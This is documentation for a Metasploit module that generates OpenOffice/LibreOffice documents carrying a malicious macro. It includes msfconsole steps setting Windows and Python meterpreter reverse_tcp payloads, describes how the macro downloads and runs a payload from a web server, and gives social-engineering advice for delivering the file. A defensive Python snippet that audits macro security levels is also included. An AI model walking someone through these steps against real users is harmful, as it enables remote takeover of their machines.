## Vulnerable Application

This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
works against LibreOffice.

To exploit successfully, the targeted user must adjust the security level in Macro Security to
either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the
macro. If set to Low, the macro can automatically run without any warning.

* Apache OpenOffice
* LibreOffice

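
The Medium/Low precondition described above can be audited on an endpoint. The following is an added example (not part of the module or its documentation) that reads `MacroSecurityLevel` from a user profile's `registrymodifications.xcu`; the file name, registry path, the 0-3 level mapping and the `sample_profile` helper are assumptions to confirm against the installed OpenOffice/LibreOffice version.

```python
import xml.etree.ElementTree as ET

OOR = "{http://openoffice.org/2001/registry}"
SCRIPTING_PATH = "/org.openoffice.Office.Common/Security/Scripting"
# Assumed mapping of the stored integer to the labels in the Macro Security dialog.
LEVELS = {0: "Low", 1: "Medium", 2: "High", 3: "Very High"}


def audit_macro_security(xcu: bytes) -> dict:
    """Classify the MacroSecurityLevel stored in a registrymodifications.xcu profile."""
    result = {"level": None, "label": "unset (product default applies)", "exposed": None}
    try:
        root = ET.fromstring(xcu)
    except ET.ParseError:
        result["label"] = "unreadable profile"
        return result
    for item in root.iter("item"):
        if item.get(OOR + "path") != SCRIPTING_PATH:
            continue
        for prop in item.iter("prop"):
            value = (prop.findtext("value") or "").strip()
            if prop.get(OOR + "name") == "MacroSecurityLevel" and value.isdigit():
                level = int(value)
                # Medium prompts the user to enable macros; Low runs them silently.
                result.update(level=level, label=LEVELS.get(level, "unknown"),
                              exposed=level <= 1)
    return result


def sample_profile(level=None) -> bytes:
    """Constructed sample profile; a real one holds many more <item> entries."""
    item = ""
    if level is not None:
        item = (f'<item oor:path="{SCRIPTING_PATH}"><prop oor:name="MacroSecurityLevel"'
                f' oor:op="fuse"><value>{level}</value></prop></item>')
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<oor:items xmlns:oor="http://openoffice.org/2001/registry">'
            f'{item}</oor:items>').encode()


if __name__ == "__main__":
    for lvl in (None, 0, 1, 2, 3):
        print(lvl, audit_macro_security(sample_profile(lvl)))
```
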
## Verification Steps

To use this exploit, you must know the platform of the targeted user. The module supports Windows,
Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
with malicious PowerShell code inside. For other supported platforms, the exploit will generate
Python code.

An example of using this module against Windows:

1. Start msfconsole
2. ```use exploit/multi/misc/openoffice_document_macro```
3. ```set target 0```
4. ```set payload windows/meterpreter/reverse_tcp```
5. ```exploit```

An example of using this module against Linux or OSX:

1. Start msfconsole
2. ```use exploit/multi/misc/openoffice_document_macro```
3. ```set target 1```
4. ```set payload python/meterpreter/reverse_tcp```
5. ```exploit```

Once started, the module will mainly do these things:

1. It will start a payload handler.
2. It will start a web server. This is used for the macro to download and execute our final payload.
3. It will generate the malicious odt file. Send this to your targeted user.

## Options

**BODY**

This option can be used to insert text into the malicious document.

## Scenarios

### Modification

Since social engineering will play a big part in the success of the attack, you will most likely
want to modify the odt file.

1. To do so, first use msfconsole to generate the malicious odt file.
2. Move the odt file to a system that has OpenOffice or LibreOffice.
3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro
   code unless you actually know what you're doing.